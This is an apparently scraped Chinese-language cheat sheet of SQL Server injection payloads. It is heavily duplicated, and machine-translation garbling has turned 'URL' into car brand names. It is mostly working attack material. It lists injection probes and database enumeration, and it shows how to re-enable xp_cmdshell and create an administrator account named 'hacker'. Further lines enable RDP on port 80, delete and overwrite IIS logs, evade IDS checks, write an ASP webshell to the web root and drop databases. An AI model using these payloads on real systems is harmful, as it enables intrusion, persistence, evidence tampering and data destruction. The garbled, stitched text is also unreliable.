 

if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

2.添加xp_cmdshell扩大进程的主意是选用如下语句:

(1)SQL Query Analyzer

DOS下开3389 并修改端口号

2.添加xp_cmdshell扩展进度的形式是运用如下语句:

(1)SQL Query Analyzer

sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

sc config termservice start= auto

(1)SQL Query Analyzer

sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入

net start termservice

sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

//允许外连

(2)首先在SqlEx ec Sunx Version的Format选项里填上%s,在CMD选项里输入

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

去除

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

去除

sp_dropextendedproc 'xp_cmdshell'

//该3389端口到80

去除

sp_dropextendedproc 'xp_cmdshell'

(3)MSSQL2000

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f

sp_dropextendedproc 'xp_cmdshell'

(3)MSSQL2000

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

SQL Server

(3)MSSQL2000

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

?

 

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

?

SQL手工业注入方法总括(SQL Server二〇〇七)二零零六-01-28 16:17---------以下以简练注入点用U奥迪Q5L代替

判定是或不是可打针:

SQL手工注入方法总结(SQL Server2007)二零一零-01-28 16:17---------以下以轻便注入点用U大切诺基L替代

SQL手工业注入方法总计(SQL Server2007)二〇〇八-01-28 16:17---------以下以简要注入点用U福睿斯L取代

--(1) ******翻看驱动器方法******

--(1) ******查阅驱动器方法******

--(1) ******翻开驱动器方法******

-- 建表p(i为自动编号,a记录盘符类似"c:",b记录可用字节,别的省略)
URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--

'

-- 建表p(i为自动编号,a记录盘符类似"c:",b记录可用字节,别的省略)
URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar( 255),d nvarchar(255));--

-- 建表p(i为自动编号,a记录盘符类似"c:",b记录可用字节,另外省略)
URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--

URL;insert p exec xp_availablemedia;--列出装有驱动器并插入表p

 and 1=1

URL;insert p exec xp_availablemedia;--列出富有驱动器并插入表p

URL;insert p exec xp_availablemedia;--列出所有驱动器并插入表p

URL;and (select count(*) from p)>3;--折半法查出驱动器总量

 and 1=2

URL;and (select count(*) from p)>3;--折半法查出驱动器总的数量

URL;and (select count(*) from p)>3;--折半法查出驱动器总量

U奥迪Q5L;and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驱动器名(注asc(c)=67)

' and 1=1

USportageL;and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驱动器名(注asc(c)=67)

U宝马X5L;and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驱动器名(注asc(c)=67)

--上边日常用于无显错景况下行使-------依此类推,获得全数驱动器名

' and 1=2

--上边平时用于无显错情况下采用-------由此及彼,获得全数驱动器名

--上边日常用于无显错情况下选择-------就那样类推,获得全数驱动器名

UPRADOL;and (select a from p where i=1)>3;--报错获得第贰个驱动器名

searchpoints%' and 1=1

U揽胜L;and (select a from p where i=1)>3;--报错获得第三个驱动器名

UOdysseyL;and (select a from p where i=1)>3;--报错获得第三个驱动器名

--上边日常用来显错境况下利用-------依此类推,得到全体驱动器名

searchpoints%' and 1=2

--上面日常用来显错情状下利用-------就那样类推,获得全体驱动器名

--下面常常用于显错意况下利用-------就那样类推,获得全部驱动器名

URL;;drop table p;--删除表p

 

URL;;drop table p;--删除表p

URL;;drop table p;--删除表p

--(2) ******查阅目录方法******

明显数据库类型:

--(2) ******翻看目录方法******

--(2) ******查看目录方法******

U揽胜极光L;create table pa(m nvarchar(255),i nvarchar(255));--建表pa(m记录目录,i记录深度)

 and user>0

U昂CoraL;create table pa(m nvarchar(255),i nvarchar(255));--建表pa(m记录目录,i记录深度)

U本田UR-VL;create table pa(m nvarchar(255),i nvarchar(255));--建表pa(m记录目录,i记录深度)

URL;insert pa exec xp_dirtree ’e:’;--列出驱动器e并插入表pa

 and (select count(*) from sysobjects)>0

URL;insert pa exec xp_dirtree ’e:’;--列出驱动器e并插入表pa

URL;insert pa exec xp_dirtree ’e:’;--列出驱动器e并插入表pa

URL;and (select count(*) from pa where i>0)>-1;--折半法查出i深度

 

URL;and (select count(*) from pa where i>0)>-1;--折半法查出i深度

URL;and (select count(*) from pa where i>0)>-1;--折半法查出i深度

U奥德赛L;and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--报错获得深度i=1的首先个目录名

查询当前顾客数据新闻:

UCR-VL;and (select top 1 m from pa where i=1 an d m not in(select top 0 m from pa))>0;--报错获得深度i=1的第三个目录名

UTucsonL;and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--报错获得深度i=1的率先个目录名

--上边常常用显错且目录名不为数字情状下行使-------(获得第叁个目录把"top 0"换为"top 1",换深度只换i就行)依此类推,获得e盘的有所目录

article.asp?id=6 having 1=1--

--上边日常用显错且目录名不为数字情状下利用-------(获得第3个目录把"top 0"换为"top 1",换深度只换i就行)依此类推,获得e盘的具备目录

--上面经常用显错且目录名不为数字情状下使用-------(获得第三个目录把"top 0"换为"top 1",换深度只换i就行)由此及彼,得到e盘的装有目录

U猎豹CS6L;and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--折半法查出深度i=1的率先个目录名的尺寸

 

U奥迪Q5L;and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--折半 法查出深度i=1的首先个目录名的尺寸

U奥迪Q5L;and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--折半法查出深度i=1的首先个目录名的长度

U大切诺基L;and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--折半法查出深度i=1的首先个目录名的首先个字符长度

暴当前表中的列:

U汉兰达L;and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--折半法查出深度i=1的第一个目录名的第贰个字符长度

USportageL;and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--折半法查出深度i=1的首先个目录名的率先个字符长度

--上面平时用无显错情状下行使-------(得到第三个目录把"top 0"换为"top 1",换深度只换i就行)就那样推算,获得e盘的有所目录

article.asp?id=6 group by admin.username having 1=1--

--上边日常用无显错情况下利用-------(获得第二个目录把"top 0"换为"top 1",换深度只换i就行)就那样推算,获得e盘的享有目录

--下边平常用无显错景况下使用-------(获得第二个目录把"top 0"换为"top 1",换深度只换i就行)就那样类推,获得e盘的装有目录

URL;drop

article.asp?id=6 group by admin.username,admin.password having 1=1--

URL;drop table pa;--删除表pa

URL;drop

手工业MSSQL注入常用SQL语句
and exists (select * from sysobjects) //决断是或不是是MSSQL
and exists(select * from tableName) //剖断某表是或不是存在..tableName为表名
and 1=(select @@VERSION) //MSSQL版本
And 1=(select db_name()) //当前数量库名
and 1=(select @@servername) //本地服务名
and 1=(select IS_SCRUISERVROLEMEMBEGL450(‘sysadmin’)) //决断是还是不是是系统管理员
and 1=(Select IS_MEMBER(‘db_owner’)) //推断是还是不是是库权限
and 1= (Select HAS_DBACCESS(‘master’)) //判定是否有库读取权限
and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3….
;declare @d int //是或不是扶助多行
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ‘X’ AND name = ‘xp_cmdshell’) //判断XP_CMDSHELL是不是存在
and 1=(select count(*) FROM master.dbo.sysobjects where name= ‘xp_regread’) //查看XP_regread扩张存款和储蓄进程是还是不是已经被剔除
丰硕和删除一个SA权限的客户test:(必要SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
停掉或激活有些服务。 (要求SA权限)
exec master..xp_servicecontrol ‘stop’,’schedule’
exec master..xp_servicecontrol ‘start’,’schedule’
暴网址目录
create table labeng(lala nvarchar(255), id int)
DECLARE @result varchar(255) EXEC master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots’,’/’,@result output insert into labeng(lala) values(@result);
and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from labeng where lala>1)
—————————————————————————————————————————————————————分割
SQL Server
认清是不是可打针:


and 1=1
and 1=2
and 1=1
and 1=2
searchpoints%’ and 1=1
searchpoints%’ and 1=2
规定数据库类型:
and user>0
and (select count(*) from sysobjects)>0
查询当前客户数据新闻:
article.asp?id=6 having 1=1–
暴当前表中的列:
article.asp?id=6 group by admin.username having 1=1–
article.asp?id=6 group by admin.username,admin.password having 1=1–
暴率性表和列:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id(‘admin’),N) from sysobjects)>1
暴数据库数据:
and (select top 1 password from admin where id=N)>1
修改数据库中的数据:
;update admin set password=’oooooo’ where username=’xxx’
扩大数据库中的数据:
;insert into admin values (xxx,oooooo)–
删数据库:
;drop database webdata
赢妥善前数据库客商名:and user>0
取伏贴前数据库名:and db_name()>0
获得数据库版本:and (select @@version)>0
认清是还是不是支持多句询问:;declare @a int–
剖断是或不是帮忙子查询:and (select count(1) from [sysobjects])>=0
数据库的恢弘存款和储蓄进度:exec master..xp_cmdshell
翻开服务器C盘目录:;exec_master..xp_cmdshell ‘dir c:’
推断扩大存储进程是或不是留存:and select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
回复扩张存储进程:;exec sp_addextendedproc xp_cmdshell,’xplog70.dll’
除去扩张存款和储蓄过程:;exec sp_dropextendedproc ‘xp_cmdshell’
在MSSQL3000中提供了有个别函数用于访谈OLE对象直接获取权力:
;declare @s int
;exec sp_oacreat ‘wscript.shell’,@s
;exec master..spoamethod @s,’run’,null,’cmd.exe/c dir c:’
决断当前数据库客商名是不是具备相比较高的权位:
and 1=(select is_srvrolemember(‘sysadmin’))
and 1=(select is_srvrolemember(‘serveradmin’))
and 1=(select is_srvrolemember(‘setupadmin’))
and 1=(select is_srvrolemember(‘securityadmin’))
and 1=(select is_srvrolemember(‘diskadmin’))
and 1=(select is_srvrolemember(‘bulkadmin’))
看清当前数据库顾客名是不是为DB_OWNER:
and 1=(select is_member(‘db_owner’))
在SQLSE奥迪Q5VEWrangler的master.dbo.sysdatabases表中贮存着SQLSE陆风X8VE劲客数据库系统中的全部数据库消息,只要求PUBLIC权限就可以对此表打开SELECT操作:
and (select top 1 name from master.dbo.sysdatabase order by dbid)>0
and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0
剔除日志记录:
;exec master.dbo.xp_cmdshell ‘del c:winntsystem32logfilesw3svc5ex070606.log >c:temp.txt’
轮换日志记录:
;exec master.dbo.xp_cmdshell ‘copy c:winntsystem32logfilesw3svc5ex070404.log c:winntsystem32logfilesw3svc5ex070606.log >c:temp.txt’
获取WEB路径:
;declare @shell int
;exec master..sp_oamethod ‘wscript.shell’,@shell out
;exec master..sp_oamethod @shell,’run’,null,’cmd.exe/c dir /s d:/index.asp >c:/log.txt
利用XP_CMDSHELL搜索:
;exec master..xp_cmdshell ‘dir /s d:/index.asp’
展示服务器网站配置音讯命令:
cmd /c cscript.exe c:inetpubadminscriptadsutil.vbs enum w3svc/1/root
cmd /c cscript.exe c:inetpubadminscriptadsutil.vbs enum w3svc/2/root
利用XP_REGREAD可用PUBLIC权限读取:
;exec master.dbo.xp_regread
hkey_local_machine,
‘systemcurrentcontrolsetservicesw3svcparametersvirtual roots’
‘/’
SQLSEV8 VantageVE劲客下的高档次和品级手艺能够参照他事他说加以考察阅读曾云好所著的贯通脚本红客第五章。
3、DSqlHelper
检测权限SYSADMIN:
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’))
serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin、db_owner。
检测XP_CMDSHELL(CMD命令):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_cmdshell’)
检测XP_REGREAD(注册表读取功能):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_regread’)
检测SP_MAKEWEBTASK(备份功效):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘sp_makewebtask’)
检测SP_ADDEXTENDEDPROC:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘sp_addextendedproc’)
检测XP_SUBDI本田CR-VS读子目录:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_subdirs’)
检测XP_DIRTREE读子目录:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_dirtree’)
修改内容:
; UPDATE 表名 set 字段=内容 where 1=1
XP_CMDSHELL检测:
;exec master..xp_cmdshell ‘dir c:’
修复XP_CMDSHELL:
;exec master.dbo.sp_addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’
用XP_CMDSHELL增添顾客红客:
;exec master.dbo.xp_cmdshell ‘net user hacker 123456 /add’
XP_CMDSHELL把用户hacker加到ADMIN组:
;exec master.dbo.xp_cmdshell ‘net localgroup administrators hacker /add’
创建表test:
;create table [dbo].[test] ([dstr][char](255));
检查评定表段test:
and exists (select * from test)
读取WEB的职位(读注册表):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots’, ‘/’,@result output insert into test (dstr) values(@result);–
纸包不住火WEB的相对路线(显错格局):
and 1=(select count(*) from test where dstr > 1)
删除表test:
;drop table test;–
创造查看目录的表dirs:
;create table dirs(paths varchar(100), id int)
把查看目录的剧情参加表dirs:
;insert dirs exec master.dbo.xp_dirtree ‘c:’
爆目录的内容dirs:
and 0<>(select top 1 paths from dirs)
备份数据库DATANAME:
declare @a sysname; set @a=db_name();backup DATANAME @a to disk=’c:inetpubwwwrootdown.bak’;–
删除表dirs:
;drop table dirs;–
创建表temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–
把驱动盘列表插手temp表:
;insert temp exec master.dbo.xp_availablemedia;–
删除表temp:
;delete from temp;–
创建表dirs:
;create table dirs(paths varchar(100), id int);–
赢得子目录列表XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs ‘c:’;–
露马脚内容(显错格局):
and 0<>(select top 1 paths from dirs)
删除表dirs:
;delete from dirs;–
创建表dirs:
;create table dirs(paths varchar(100), id int)–
用XP_CMDSHELL查看目录内容:
;insert dirs exec master..xp_cmdshell ‘dir c:’
删除表dirs:
;delete from dirs;–
检测SP_OAcreate(推行命令):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘SP_OAcreate’)
SP_OAcreate执行CMD命令:
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:WINNTsystem32cmd.exe /c net user hacker 123456 /add’
SP_OAcreate建目录:
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:WINNTsystem32cmd.exe /c md c:inetpubwwwroot1111’
创制二个虚拟目录E盘:
;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL,’ cscript.exe c:inetpubwwwrootmkwebdir.vbs -w “默认 Web 站点” -v “e”,”e:”‘
设置虚构目录E为可读:
;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL,’ cscript.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e browse’
启动SERVER服务:
;exec master..xp_servicecontrol ‘start’, ‘server’
绕过IDS检测XP_CMDSHELL:
;declare @a sysname set @a=’xp_’ ’cmdshell’ exec @a ‘dir c:’
敞开远程数据库1:
; select * from OPENROWSET(‘SQLOLEDB’, ‘server=servername;uid=sa;pwd=apachy_123’, ‘select * from table1’ )
翻开远程数据库2:
;select * from OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from table’

 

----------------------------经过地点的艺术就可拿到服务器全体目录(这里为总是顾客有读取权限目录)-----------------

手工业MSSQL注入常用SQL语句
and exists (select * from sysobjects) //剖断是不是是MSSQL
and exists(select * from tableName) //决断某表是还是不是留存..tableName为表名
and 1=(select @@VERSION) //MSSQL版本
And 1=(select db_name()) //当前数量库名
and 1=(select @@servername) //本地服务名
and 1=(select IS_S瑞鹰VROLEMEMBE昂Cora(‘sysadmin’)) //剖断是还是不是是系统管理员
and 1=(Select IS_MEMBER(‘db_owner’)) //决断是否是库权限
and 1= (Select HAS_DBACCESS(‘master’)) //剖断是不是有库读取权限
and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3….
;declare @d int //是不是帮衬多行
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ‘X’ AND name = ‘xp_cmdshell’) //判断XP_CMDSHELL是或不是留存
and 1=(select count(*) FROM master.dbo.sysobjects where name= ‘xp_regread’) //查看XP_regread扩张存款和储蓄进程是否已经被删除
丰硕和删除三个SA权限的客商test:(供给SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
停掉或激活有个别服务。 (供给SA权限)
exec master..xp_servicecontrol ‘stop’,’schedule’
exec master..xp_servicecontrol ‘start’,’schedule’
暴网址目录
create table labeng(lala nvarchar(255), id int)
DECLARE @result varchar(255) EXEC master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots’,’/’,@result output insert into labeng(lala) values(@result);
and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from labeng where lala>1)
—————————————————————————————————————————————————————分割
SQL Server
推断是或不是可打针:


and 1=1
and 1=2
and 1=1
and 1=2
searchpoints%’ and 1=1
searchpoints%’ and 1=2
规定数据库类型:
and user>0
and (select count(*) from sysobjects)>0
询问当前顾客数量消息:
article.asp?id=6 having 1=1–
暴当前表中的列:
article.asp?id=6 group by admin.username having 1=1–
article.asp?id=6 group by admin.username,admin.password having 1=1–
暴自便表和列:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id(‘admin’),N) from sysobjects)>1
暴数据库数据:
and (select top 1 password from admin where id=N)>1
修改数据库中的数据:
;update admin set password=’oooooo’ where username=’xxx’
扩大数据库中的数据:
;insert into admin values (xxx,oooooo)–
删数据库:
;drop database webdata
得到当前数据库顾客名:and user>0
获取当前数据库名:and db_name()>0
获得数据库版本:and (select @@version)>0
决断是或不是补助多句询问:;declare @a int–
剖断是不是支持子查询:and (select count(1) from [sysobjects])>=0
数据库的恢宏存款和储蓄进程:exec master..xp_cmdshell
查看服务器C盘目录:;exec_master..xp_cmdshell ‘dir c:’
看清扩张存款和储蓄进度是不是存在:and select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
过来扩大存款和储蓄进程:;exec sp_addextendedproc xp_cmdshell,’xplog70.dll’
去除扩张存款和储蓄进度:;exec sp_dropextendedproc ‘xp_cmdshell’
在MSSQL2000中提供了部分函数用于访谈OLE对象间接获取权力:
;declare @s int
;exec sp_oacreat ‘wscript.shell’,@s
;exec master..spoamethod @s,’run’,null,’cmd.exe/c dir c:’
认清当前数据库客商名是或不是具备比较高的权柄:
and 1=(select is_srvrolemember(‘sysadmin’))
and 1=(select is_srvrolemember(‘serveradmin’))
and 1=(select is_srvrolemember(‘setupadmin’))
and 1=(select is_srvrolemember(‘securityadmin’))
and 1=(select is_srvrolemember(‘diskadmin’))
and 1=(select is_srvrolemember(‘bulkadmin’))
判别当前数据库客商名是还是不是为DB_OWNER:
and 1=(select is_member(‘db_owner’))
在SQLSEGL450VE揽胜的master.dbo.sysdatabases表中存放着SQLSEHighlanderVE奥迪Q5数据库系统中的全部数据库消息,只必要PUBLIC权限就足以对此表打开SELECT操作:
and (select top 1 name from master.dbo.sysdatabase order by dbid)>0
and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0
删除日志记录:
;exec master.dbo.xp_cmdshell ‘del c:winntsystem32logfilesw3svc5ex070606.log >c:temp.txt’
轮换日志记录:
;exec master.dbo.xp_cmdshell ‘copy c:winntsystem32logfilesw3svc5ex070404.log c:winntsystem32logfilesw3svc5ex070606.log >c:temp.txt’
获取WEB路径:
;declare @shell int
;exec master..sp_oamethod ‘wscript.shell’,@shell out
;exec master..sp_oamethod @shell,’run’,null,’cmd.exe/c dir /s d:/index.asp >c:/log.txt
利用XP_CMDSHELL搜索:
;exec master..xp_cmdshell ‘dir /s d:/index.asp’
来得服务器网址配置新闻命令:
cmd /c cscript.exe c:inetpubadminscriptadsutil.vbs enum w3svc/1/root
cmd /c cscript.exe c:inetpubadminscriptadsutil.vbs enum w3svc/2/root
利用XP_REGREAD可用PUBLIC权限读取:
;exec master.dbo.xp_regread
hkey_local_machine,
‘systemcurrentcontrolsetservicesw3svcparametersvirtual roots’
‘/’
SQLSEQashqaiVEOdyssey下的高端级本事能够参见阅读曾云好所著的理解脚本黑客第五章。
3、DSqlHelper
检查评定权限SYSADMIN:
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’))
serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin、db_owner。
检测XP_CMDSHELL(CMD命令):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_cmdshell’)
检测XP_REGREAD(注册表读取功效):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_regread’)
检测SP_MAKEWEBTASK(备份作用):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘sp_makewebtask’)
检测SP_ADDEXTENDEDPROC:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘sp_addextendedproc’)
检测XP_SUBDISportageS读子目录:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_subdirs’)
检测XP_DIRTREE读子目录:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_dirtree’)
修改内容:
; UPDATE 表名 set 字段=内容 where 1=1
XP_CMDSHELL检测:
;exec master..xp_cmdshell ‘dir c:’
修复XP_CMDSHELL:
;exec master.dbo.sp_addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’
用XP_CMDSHELL增多顾客骇客:
;exec master.dbo.xp_cmdshell ‘net user hacker 123456 /add’
XP_CMDSHELL把用户hacker加到ADMIN组:
;exec master.dbo.xp_cmdshell ‘net localgroup administrators hacker /add’
创建表test:
;create table [dbo].[test] ([dstr][char](255));
检查实验表段test:
and exists (select * from test)
读取WEB的岗位(读注册表):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots’, ‘/’,@result output insert into test (dstr) values(@result);–
揭破WEB的相对路线(显错形式):
and 1=(select count(*) from test where dstr > 1)
删除表test:
;drop table test;–
创造查看目录的表dirs:
;create table dirs(paths varchar(100), id int)
把查看目录的开始和结果参加表dirs:
;insert dirs exec master.dbo.xp_dirtree ‘c:’
爆目录的剧情dirs:
and 0<>(select top 1 paths from dirs)
备份数据库DATANAME:
declare @a sysname; set @a=db_name();backup DATANAME @a to disk=’c:inetpubwwwrootdown.bak’;–
删除表dirs:
;drop table dirs;–
创建表temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–
把驱动盘列表参加temp表:
;insert temp exec master.dbo.xp_availablemedia;–
删除表temp:
;delete from temp;–
创建表dirs:
;create table dirs(paths varchar(100), id int);–
获得子目录列表XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs ‘c:’;–
纸包不住火内容(显错形式):
and 0<>(select top 1 paths from dirs)
删除表dirs:
;delete from dirs;–
创建表dirs:
;create table dirs(paths varchar(100), id int)–
用XP_CMDSHELL查看目录内容:
;insert dirs exec master..xp_cmdshell ‘dir c:’
删除表dirs:
;delete from dirs;–
检测SP_OAcreate(实行命令):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘SP_OAcreate’)
SP_OAcreate执行CMD命令:
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:WINNTsystem32cmd.exe /c net user hacker 123456 /add’
SP_OAcreate建目录:
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:WINNTsystem32cmd.exe /c md c:inetpubwwwroot1111’
始建二个设想目录E盘:
;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL,’ cscript.exe c:inetpubwwwrootmkwebdir.vbs -w “默认 Web 站点” -v “e”,”e:”‘
安装设想目录E为可读:
;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL,’ cscript.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e browse’
启动SERVER服务:
;exec master..xp_servicecontrol ‘start’, ‘server’
绕过IDS检测XP_CMDSHELL:
;declare @a sysname set @a=’xp_’ ’cmdshell’ exec @a ‘dir c:’
开启远程数据库1:
; select * from OPENROWSET(‘SQLOLEDB’, ‘server=servername;uid=sa;pwd=apachy_123’, ‘select * from table1’ )
敞开远程数据库2:
;select * from OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from table’

暴任意表和列:

--(3) 数据库备份到Web目录(先拿个WebShell再说啊 注:此为SQL Server3000)

一度起来冒汗了.

and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1

URL;alter database employ_ set RECOVE奥迪Q5Y FULL;--把近日库L设置成日志完全恢复生机方式

原作地址:

and (select top col_name(object_id('admin'),N) from sysobjects)>1

URL;URL;c reate table s(l image);--建表s

 

U悍马H2L;backup log s to disk = ’c:cmd’ with init;--减弱备分数据的尺寸

暴数据库数据:

U酷威L;ULANDL;insert s values(’’)--在表s中插入一句话马

and (select top 1 password from admin where id=N)>1

URL;backup log hh to disk = ’e:webg.asp’;--备分日志到WEB路线

 

URL;drop table s;--删除表s

修改数据库中的数据:

UEscortL;alter database hh set RECOVERubiconY SIMPLE;--把SQL设置成日志简单复苏方式

;update admin set password='oooooo' where username='xxx'

--------------------------------------OK到此WebShell应该获得了-----------------------------------------------

 

--(4) 以下为一些注入杂项

增加数据库中的数据:

  • ---SA权限:

;insert into admin values (xxx,oooooo)--

URL;exec aster.dbo.sp_addlogin hacker;--添加SQL用户

 

URL;exec master.dbo.sp_password null,红客,红客;--设置SQL帐号黑客的密码为 骇客

删数据库:

RL; exec master.dbo.sp_addsrvrolemember sysadmin hacker;--加hacker进sysadmin管理组

;drop database webdata

URL;exec master.dbo.xp_cmdshell ’net user hacker hacker /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;--创立三个系统用骇客 并安装其密码为红客

 

URL;exec master.dbo.xp_cmdshell ’net localgroup administrators 黑客/add’;--黑客到场到管理员组

获取当前数据库顾客名:and user>0

---- SQL Server2006暴库、表、段法(前提有显错、无显错用折半法)

赢稳妥前数据库名:and db_name()>0

URL and 0<(select count(*) from master.dbo.sysdatabases);--折半法获得数据库个数

获得数据库版本:and (select @@version)>0

URL and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--

 

--依次提交 dbid = 2.3.4... 获得更加多的数据库名

看清是或不是帮衬多句询问:;declare @a int--

URL and 0<(select count(*) name from employ.dbo.sysobjects where xtype=’U’);--折半法获得表个数(假使暴出库名employ)

认清是还是不是支持子查询:and (select count(1) from [sysobjects])>=0

URL and 0<(select top 1 name from employ.dbo.sysobjects where xtype=’U’)

 

-- 即使暴出 表名称为"employ_qj"则在上头语句上加条件 and name not in (’employ_qj’ 以此直接加条件....

数据库的增加存款和储蓄进程:exec master..xp_cmdshell

URL and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = ’u’ and name = ’employ_qj’));--

翻开服务器C盘目录:;exec_master..xp_cmdshell 'dir c:'

--假如暴出字段名称为"id"则在地点语句上加上条件 and name not is(’id’) 以此平昔加条件....

判别增添存款和储蓄进程是或不是存在:and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

---------------------按上边方法库、表、段的名目都得以获得----用以上办法能够获得段段里的数额--------------------
select * from master.dbo.sysdatabases --查询数据库

过来扩张存款和储蓄进程:;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'

select * from NetBook.dbo.sysobjects where xtype=’u’ --查询数据库NetBook里的表

剔除扩充存款和储蓄进度:;exec sp_dropextendedproc 'xp_cmdshell'

